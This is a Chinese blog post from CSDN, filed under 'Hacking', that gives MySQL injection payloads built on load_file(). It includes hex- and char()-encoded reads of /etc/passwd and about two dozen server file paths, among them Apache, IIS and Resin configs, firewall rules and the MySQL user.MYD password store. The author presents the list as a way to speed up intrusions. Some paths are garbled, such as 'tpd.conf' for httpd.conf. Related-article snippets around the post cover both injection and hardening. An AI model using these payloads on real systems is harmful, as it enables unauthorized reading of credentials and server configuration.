load_file() MYSQL入侵时查看常用敏感信息文件

最新推荐文章于 2024-02-16 23:13:51 发布
最新推荐文章于 2024-02-16 23:13:51 发布
阅读量1.2k 收藏
点赞数
分类专栏: Hacking 文章标签: mysql file apache phpmyadmin windows freebsd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6753108
版权

以下是大家针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径,合理的利用好,可以加快你的入侵速度.以下是本人入侵时收集起来.如果大家感觉这上面没有的路径.请继续在回复中接起来.一起分享.BY:孤狐浪子


  1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
  2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
  上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
  3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
  4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
  5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件
  6、c:/Resin-3.0.14/conf/resin.conf   查看jsp开发的网站 resin文件配置信息.
  7、c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
  8、d:\APACHE\Apache2\conf\httpd.conf
  9、C:\Program Files\mysql\my.ini
  10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
  11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
  12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
  13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
  14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
  15、 /etc/sysconfig/iptables 本看防火墙策略
  16 、 usr/local/app/php5 b/php.ini PHP 的相当设置
  17 、/etc/my.cnf MYSQL的配置文件
  18、 /etc/redhat-release   红帽子的系统版本
  19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
  20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
  21、/usr/local/app/php5 b/php.ini //PHP相关设置
  22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
  23、c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
  24、c:\windows\my.ini
7禧
关注
专栏目录
mysql敏感信息数据加解密——工作笔记
大蟒蛇来了
04-15 2211
应总部要求,保证用户信息安全,对所有涉及到用户敏感信息的字段在数据库中都要进行密文存储。 既然需求来了那么我们自然而然就召开紧急会议,对总部的要求进行评估分析,提出解决方案。经过讨论提出了两种加解密方案: AES加解密方案:AES_ENCRYPT() / AES_DECRYPT() DES加解密方案:DES_ENCRYPT() / DES_DECRYPT() 比如对PHONE字段进行加密,那就在数...
mysql5.7 表加密_MySQL 整表加密解决方案 keyring_file
weixin_36312603的博客
02-07 597
说明MySql社区版从5.7.11开始支持基于表的数据加密方案,模块名为keyring_file,支持加密整张表。这种是加密方式其实是基于文件加密的,一旦mysqld读取key启动后,将会解密整张表的数据,在mysql服务内,读取的数据都是解密后的,也就是说对客户端而言是无感知的。而这个key是本地存放的,mysql服务拥有读写这个key的权限。总体看这种方案不太安全,原因是数据库文件是加密的,但...
load_file() 常用敏感信息.txt
07-18
load_file() 常用敏感信息
MySQL敏感资源文件_解决mysql数据库大小写敏感问题
weixin_30210749的博客
02-18 163
今天在部署java项目到linux服务器上去的候出现了个小问题,数据库是mysql,项目在我本地(windows环境下)是没问题的。错误信息:2012-09-06 00:01:29,314 INFO [org.springframework.jdbc.datasource.JdbcTransactionObjectSupport]- 2012-09-06 00:01:29,903 WARN [o...
MySQL敏感资源文件_Windows Mysql8 设置大小写敏感
weixin_31495827的博客
02-28 96
windows系统无法改成 lower_case_table_names=0, 因为windows默认是1,就算改也只能改成2,以下截自 MySQL 8.0 Reference Manual 然后,当我们按照网上方法把 my.ini中的lower_case_table_names强行改成2之后,会发现,mysql server无法启动了!!这是因为(下面还是MySQL 8.0 Reference ...
MYSQL注入|文件读写|获取敏感信息|上传getshell|绕过宽字节、magic_quotes_gpc
没有
04-09 4208
文章目录1.SQL注入的思维导图2.MYSQL注入思维导图3.文件读写获取路径常见方法(1).报错显示(2).遗留文件(3).漏洞报错(4).平台配置文件(5). 爆破文件读写函数(1)load_file():读取函数(2)into outfile或iinto dumpfile:导出函数写入WebShell的几种方式 1.SQL注入的思维导图 2.MYSQL注入思维导图 3.文件读写 文件读写操作: load_file():读取函数 into outfile或iinto dumpfile:导出函数 会用
snort create mysql_Snort入侵检测系统构建
weixin_39643336的博客
01-19 628
Snort入侵检测系统构建难度等级:中等实验长:200min【实验目的】通过本实验掌握snort入侵检测系统的搭建以及相关配置。【实验环境】Snort服务器登录信息:用户名: college密码: 360College【实验原理】搭建好Snort环境后,利用发包器,发送具有某种特征的数据包,检验规则的有效性。实验步骤预置环境说明:OS为CentOS7.snort服务器已安装了daq、bison、...
【愚公系列】2024年03月 《网络安全应急管理与技术实践》 026-网络安全应急技术与实践(数据库层-MySQL数据库安全配置)
最新发布
时光隧道
02-16 6万+
使用强密码:确保MySQL的root用户和其他用户的密码是强密码,包括大写字母、小写字母、数字和特殊字符。限制远程访问:在MySQL配置文件中,将bind-address设置为本地IP地址,或者只允许特定IP的访问,以限制远程访问MySQL数据库。使用安全套接字:启用MySQL服务器与客户端之间的安全连接,可以使用SSL证书来加密数据传输。限制用户权限:仅给予用户所需的最低权限,避免给予过高的权限,以防止恶意操作和数据泄露。定期备份数据:定期备份MySQL数据库,以防止数据丢失或损坏。
mysql权限最小化规则_Mysql 权限
weixin_42489589的博客
02-08 1125
Mysql权限组成Mysql在权限控制这方面,主要有用户模块和权限控制模块组成用户控制模块主要通过用户名,密码和连接的IP/域名来决定客户端是否可以连进来权限控制模块由于其容量小且经常使用到,所以在mysql启动的候就把相应的权限控制表载入到内存中去了。权限控制的信息存储在mysql的grant table中,有mysql.user,mysql.db, mysql.host,mysql.tabl...
MySql安全
tiansan的博客
08-08 1055
MySQL安全 Mysql配置文件:linux系统下是my.conf,windows环境下是my.ini; 数据库整体安全需求:机密性、完整性、可用性; 1、操作系统级别安全配置 1.1不要将数据库放在系统分区 Windows系统: 直接检查是否将数据库放置在C盘。 Linux系统: 在终端连接上mysql数据库,执行如下命令: show variables where vari...
Mysql注入中的outfile、dumpfileload_file函数详解
01-19
利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下 翻译一下就是 其中当参数 secure_file_priv 为空,对导入导出无限制 当值为一个指定的目录,只能向指定的目录导入导出 当值被设置为NULL,禁止导
mysql读取文件或目录_mysql几种读取文件方法的使用
weixin_32716541的博客
01-25 2568
mysql数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(但前提是权限足够)总结下mysql在不同版本读取文件方法大致有这3个:1.load_file()2.load data infile()3.system catload_file()和load data infile读取文件的方法为:新建一个表,读取文件为字符串形式插入表中,然后读出表中数据。但是通...
mysql跨服务器ssh查询_通过SSH通道跨机访问直接不可达服务(以MySQL为例)
weixin_42511990的博客
02-09 246
创建公私钥:ssh-keygen -t ed25519 -C "121@ct"约定:A代表本机,B代表可以ssh登陆的跳板机,C代表目标机(通过某个端口开通服务),C可以是B,也可以是其它B可以连接的主机现状:C机器安装了某种服务,监听某个端口(例如MySQL,3306),但是由于安全原因,C机器只允许80,22端口访问,封掉了其它所有端口。目标:不想在命令行下管理,想使用客户端来管理。解决办法:...
mysql获取文件后缀名函数_MySQL使用LOAD_FILE()函数方法总结
weixin_34392511的博客
01-18 442
MySQL中,LOAD_FILE()函数读取一个文件并将其内容作为字符串返回。语法LOAD_FILE(file_name)其中file_name是文件的完整路径。下面是我从一个文件中选择内容的示例:SELECT LOAD_FILE('/data/test.txt') AS Result;结果:+------------------------------------------+| Result...
MySQL注入load_file常用路径
weixin_34250709的博客
08-02 455
WINDOWS下: c:/boot.ini //查看系统版本 c:/windows/php.ini //php配置信息 c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt/my.ini c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库...
SQL注入渗透与防御
yk2909438315的博客
07-10 2422
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。web应用程序:移动端的app或PC端的网站网页。
mysql load file_MySQL使用LOAD_FILE()函数方法总结
weixin_35141284的博客
01-27 6381
mysql中,load_file()函数读取一个文件并将其内容作为字符串返回。语法load_file(file_name)其中file_name是文件的完整路径。下面是我从一个文件中选择内容的示例:select load_file('/data/test.txt') as result;结果:+------------------------------------------+| result...
常见的load_file()读取的敏感信息
blackguest07的博客
01-17 1145
load_file() 函数读取敏感文件,这一章就够了。
MySQL_load_file函数获取服务器文件实战与问题解析
"本文主要介绍了如何利用MySQLload_file函数获取服务器上的文件内容,并通过Navicat工具进行操作。在遇到中文文件名处理问题,提出了利用Oracle的dump函数和MySQL的char函数作为解决方案。" MySQLload_file...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值